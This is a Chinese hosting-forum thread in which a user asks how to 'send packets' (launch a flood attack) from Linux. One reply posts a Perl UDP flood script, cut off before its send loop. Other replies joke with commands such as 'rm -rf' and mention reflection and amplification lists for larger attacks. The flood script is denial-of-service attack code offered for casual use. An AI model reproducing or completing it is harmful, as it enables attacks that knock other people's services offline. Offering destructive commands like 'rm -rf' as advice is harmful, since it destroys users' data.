找回密码
 立即注册
CeraNetworksBGVM服务器主机交流IP归属甄别会员请立即修改密码
查看: 57|回复: 7

linux如何发包啊嘞

[复制链接]

22

主题

124

回帖

484

积分

中级会员

积分
484
发表于 2018-8-18 21:09:29 | 显示全部楼层 |阅读模式
作死忽然想试试 mjj有没有教程
回复

使用道具 举报

47

主题

126

回帖

531

积分

高级会员

积分
531
发表于 2018-8-18 21:28:07 | 显示全部楼层
[ol][*]#!/usr/bin/perl
[*]
[*]##############
[*]# udp flood.
[*]##############
[*]
[*]use Socket;
[*]use strict;
[*]
[*]if ($#ARGV != 3) {
[*]  print "flood.pl [i]   \n\n";
[*]  print " port=0: use random ports\n";
[*]  print " size=0: use random size between 64 and 1024\n";
[*]  print " time=0: continuous flood\n";
[*]  exit(1);
[*]}
[*]
[*]my ($ip,$port,$size,$time) = @ARGV;
[*]
[*]my ($iaddr,$endtime,$psize,$pport);
[*]
[*]$iaddr = inet_aton("$ip") or die "Cannot resolve hostname $ip\n";
[*]$endtime = time() + ($time ? $time : 1000000);
[*]
[*]socket(flood, AF_INET, SOCK_DGRAM, 17);
[*]
[*]
[*]print "Flooding $ip " . ($port ? $port : "random") . " port with " .
[*]  ($size ? "$size-byte" : "random size") . " packets" .
[*]  ($time ? " for $time seconds" : "") . "\n";
[*]print "Break with Ctrl-C\n" unless $time;
[*]
[*]for (;time() 复制代码
回复

使用道具 举报

17

主题

90

回帖

397

积分

中级会员

积分
397
发表于 2018-8-18 21:09:55 | 显示全部楼层
ping -t
回复

使用道具 举报

18

主题

321

回帖

1145

积分

金牌会员

积分
1145
发表于 2018-8-18 21:10:13 | 显示全部楼层
traceroute
回复

使用道具 举报

18

主题

321

回帖

1145

积分

金牌会员

积分
1145
发表于 2018-8-18 21:13:29 | 显示全部楼层
halt也行
回复

使用道具 举报

22

主题

124

回帖

484

积分

中级会员

积分
484
 楼主| 发表于 2018-8-18 21:24:44 | 显示全部楼层
"

大佬求教
回复

使用道具 举报

105

主题

310

回帖

1543

积分

金牌会员

积分
1543
发表于 2018-8-18 21:13:00 | 显示全部楼层
没有反射和放大表,发个鬼啊

单机发包能发出多少

回复

使用道具 举报

0

主题

219

回帖

458

积分

中级会员

积分
458
发表于 2018-8-18 21:38:55 | 显示全部楼层
rm -rf一键发包炸机房
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver|手机版|小黑屋|HS2V主机综合交流论坛

GMT+8, 2024-6-8 15:22 , Processed in 0.056060 second(s), 3 queries , Gzip On, Redis On.

Powered by Discuz! X3.5

© 2001-2023 Discuz! Team.

快速回复 返回顶部 返回列表